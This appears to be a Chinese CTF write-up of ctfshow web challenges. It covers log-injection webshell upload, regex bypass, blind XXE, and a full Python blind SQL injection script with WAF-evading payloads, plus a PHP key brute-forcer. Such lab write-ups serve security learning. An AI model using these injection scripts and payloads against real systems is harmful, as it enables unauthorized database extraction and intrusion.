签到_观己

从题目描述中没发现什么有用的信息





发现文件包含



尝试使用PHP伪协议执行命令,发现无法执行

尝试使用远程文件包含,发现也未开启

尝试使用日志注入



记录了UA值,抓包写入一句话木马



使用蚁剑连接





web1_观字



发现正则过滤,目的是访问内网靶机http://192.168.7.68/flag

使用。代替.绕过正则过滤

web2_观星



发现URL可以使用数字类型运算,尝试注入



在SQL注入中利用MySQL隐形的类型转换绕过WAF检测

写脚本尝试盲注(感谢师傅的提示)

#! /usr/bin/env python

# _*_  coding:utf-8 _*_

import requests

url = "http://2490cccb-ed3d-451e-94c6-54d36cf9a872.chall.ctf.show/index.php?id=3-"

#regexp代替=

def databases():

    database = ""

    for i in range(1, 50):

        x = 0

        for j in range(32, 135):

            payload = "case(" \

                            "ord(" \

                                "substr(" \

                                    "(select(database()))" \

                                "from({0})for(1)" \

                                ")" \

                            ")" \

                      ")" \

                      "when({1})then(0)else(1)end".format(i, j)

            text = requests.get(url + payload).text

            if "I asked nothing" in text:

                database += chr(j)

                x = 1

            if j == 132:

                if x == 0:

                    print("database name :" + database )

                    exit()

def tables():

    table = ""

    for i in range(1, 50):

        x = 0

        for j in range(32, 135):

            payload = "case(" \

                            "ord(" \

                                "substr(" \

                                    "(select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(0x77656231))" \

                                "from({0})for(1)" \

                                ")" \

                            ")" \

                      ")" \

                      "when({1})then(0)else(1)end".format(i, j)

            text = requests.get(url + payload).text

            if "I asked nothing" in text:

                table += chr(j)

                x = 1

            if j == 132:

                if x == 0:

                    print("table name:" + table )

                    exit()

def columns():

    column = ""

    for i in range(1, 50):

        x = 0

        for j in range(32, 135):

            payload = "case(" \

                            "ord(" \

                                "substr(" \

                                    "(select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))" \

                                "from({0})for(1)" \

                                ")" \

                            ")" \

                      ")" \

                      "when({1})then(0)else(1)end".format(i, j)

            text = requests.get(url + payload).text

            if "I asked nothing" in text:

                column += chr(j)

                x = 1

            if j == 132:

                if x == 0:

                    print("column name:" + column )

                    exit()

def getflag():

    flag = ""

    for i in range(1, 50):

        x = 0

        for j in range(32, 135):

            payload = "case(" \

                            "ord(" \

                                "substr(" \

                                    "(select(group_concat(flag))from(flag))" \

                                "from({0})for(1)" \

                                ")" \

                            ")" \

                      ")" \

                      "when({1})then(0)else(1)end".format(i, j)

            text = requests.get(url + payload).text

            if "I asked nothing" in text:

                flag += chr(j)

                x = 1

            if j == 132:

                if x == 0:

                    print("flag is:" + flag )

                    exit()

databases()

#tables()

#columns()

#getflag()

web3_观图



查看网页源代码



发现一个PHP文件



确定PHP版本



尝试爆破'ctfshow'.rand()中rand()所产生的值

openssl需要开启拓展,修改php.ini文件即可

<?php

$len = rand();

print ($len."\n");

for($i=0;$i<$len;$i++){

    $key = substr(md5('ctfshow'.$i),3,8);

    $image="Z6Ilu83MIDw=";

    $str = openssl_decrypt($image, 'bf-ecb', $key);

    if(strpos($str,"gif") or strpos($str,"jpg") or strpos($str,"png")){

        print($str." ");

        print($i);

        break;

    }

}

?>



爆破成功,加密得到秘钥key,并加密“config.php”

<?php

$i = 27347;

$key = substr(md5('ctfshow'.$i),3,8);

$c = "config.php";

print(openssl_encrypt($c,'bf-ecb', $key));

?>



访问该文件



由于会转换文件类型为gif,所以无法直接看到文件内容,需要下载文件再处理

web4_观心



抓取数据包



发现关键信息,猜测为xxe漏洞



发现无回显,在大佬的提示下,该漏洞为Blind XXE

XXE防御利用技巧:从XML到远程代码执行

XXE及Blind_OOB_XXE







在API接口访问http://IP地址/test.xml



查看vps中1.txt的内容

ctfshow——web_AK赛的更多相关文章

  1. CTF SHOW WEB_AK赛

    CTF SHOW平台的WEB AK赛: 签到_观己 <?php ​ if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match( ...

  2. CTFshow萌新赛-萌新福利

    下载链接文件 拿到show.bin文件 使用010Editor工具打开文件 做取反操作 取反后可以看到 把show.bin改为show.m4a 使用音频播放软件播放,即可得到flag

  3. CTFshow萌新赛-千字文

    打开靶机 下载完成后,为一张二维码图片 使用StegSolve 解出隐写图像 保存后使用PS或其他工具去除白边 然后使用脚本分割这个图像(25*25) from PIL import Image im ...

  4. CTFshow萌新赛-web签到

    打开靶机 查看页面信息 可以看到有一个system函数 在Linux中可以使用":"隔离不同的语句 payload如下 https://5105c8b6-83aa-4993-91b ...

  5. CTFshow萌新赛-密码学签到

    查看密码信息 猜测为base家族 存在"^"符号,所以应该是在base64以上 使用base85解密 成功拿到flag

  6. SCNU ACM 2016新生赛决赛 解题报告

    新生初赛题目.解题思路.参考代码一览 A. 拒绝虐狗 Problem Description CZJ 去排队打饭的时候看到前面有几对情侣秀恩爱,作为单身狗的 CZJ 表示很难受. 现在给出一个字符串代 ...

  7. SCNU ACM 2016新生赛初赛 解题报告

    新生初赛题目.解题思路.参考代码一览 1001. 无聊的日常 Problem Description 两位小朋友小A和小B无聊时玩了个游戏,在限定时间内说出一排数字,那边说出的数大就赢,你的工作是帮他 ...

  8. 2016 华南师大ACM校赛 SCNUCPC 非官方题解

    我要举报本次校赛出题人的消极出题!!! 官方题解请戳:http://3.scnuacm2015.sinaapp.com/?p=89(其实就是一堆代码没有题解) A. 树链剖分数据结构板题 题目大意:我 ...

  9. SCNU 2015ACM新生赛决赛【F. Oyk闯机关】解题报告

            题目大意:一个$N$$\times$$N$的阵列,每个格子有$X_{ij}$个调和之音,若每次只能选择走右边或下边,从左上角出发走到右下角,问最多能收集到多少个调和之音?       ...

随机推荐

  1. Java中CAS原理分析(volatile和synchronized浅析)

    CAS是什么? CAS英文解释是比较和交换,是cpu底层的源语,是解决共享变量原子性实现方案,它定义了三个变量,内存地址值对应V,期待值E和要修改的值U,如下图所示,这些变量都是在高速缓存中的,如果两 ...

  2. 04-flask-模版基础

    Jinja2 概念 Jinja2:是 Python 下一个被广泛应用的模板引擎,是由Python实现的模板语言,他的设计思想来源于 Django 的模板引擎,并扩展了其语法和一系列强大的功能,其是Fl ...

  3. 【JVM】类加载时机与过程

    虚拟机把描述类的数据从class文件加载到内存,并对数据进行校验.转换解析和初始化,最终形成可以被虚拟机直接使用的Java类型,这就是虚拟机的类加载机制.下面来总结梳理类加载的五个阶段. 类加载发生在 ...

  4. Java基础进阶:APi使用,Math,Arrarys,Objects工具类,自动拆装箱,字符串与基本数据类型互转,递归算法源码,冒泡排序源码实现,快排实现源码,附重难点,代码实现源码,课堂笔记,课后扩展及答案

    要点摘要 Math: 类中么有构造方法,内部方法是静态的,可以直接类名.方式调用 常用: Math.abs(int a):返回参数绝对值 Math.ceil(double a):返回大于或等于参数的最 ...

  5. SpringCloud 源码系列(5)—— 负载均衡 Ribbon(下)

    SpringCloud 源码系列(4)-- 负载均衡 Ribbon(上) SpringCloud 源码系列(5)-- 负载均衡 Ribbon(下) 五.Ribbon 核心接口 前面已经了解到 Ribb ...

  6. Nginx timeout配置

    缘由:客户测试反馈Request failed with status code 504,后续排查应该是nginx未配置超时设置 Step 1.打开nginx.conf查看 缺少keepalive_t ...

  7. Angular实战之使用NG-ZORRO创建一个企业级中后台框架(进阶篇)

    前言: 上一篇文章我们讲了如何在创建的Angular项目中快速引入ng-zorro-antd企业中台组件库,并且快速构建后台管理页面框架模板.这一章主要介绍的是如何在创建好的后台管理页面框架的快速生成 ...

  8. hadoop伪分布式平台组件搭建

    第一部分:系统基础配置 系统基础配置中主完成了安装大数据环境之前的基础配置,如防火墙配置和安装MySQL.JDK安装等 第一步:关闭防火墙 Hadoop与其他组件的服务需要通过端口进行通信,防火墙的存 ...

  9. 浅谈Java并发编程系列(八)—— LockSupport原理剖析

    LockSupport 用法简介 LockSupport 和 CAS 是Java并发包中很多并发工具控制机制的基础,它们底层其实都是依赖Unsafe实现. LockSupport是用来创建锁和其他同步 ...

  10. Redis原理知识点集锦

    1.Redis有哪些数据结构? 字符串String.字典Hash.列表List.集合Set.有序集合SortedSet. 高级数据结构 HyperLogLog:基数统计 GEO:地理位置 PUB/SU ...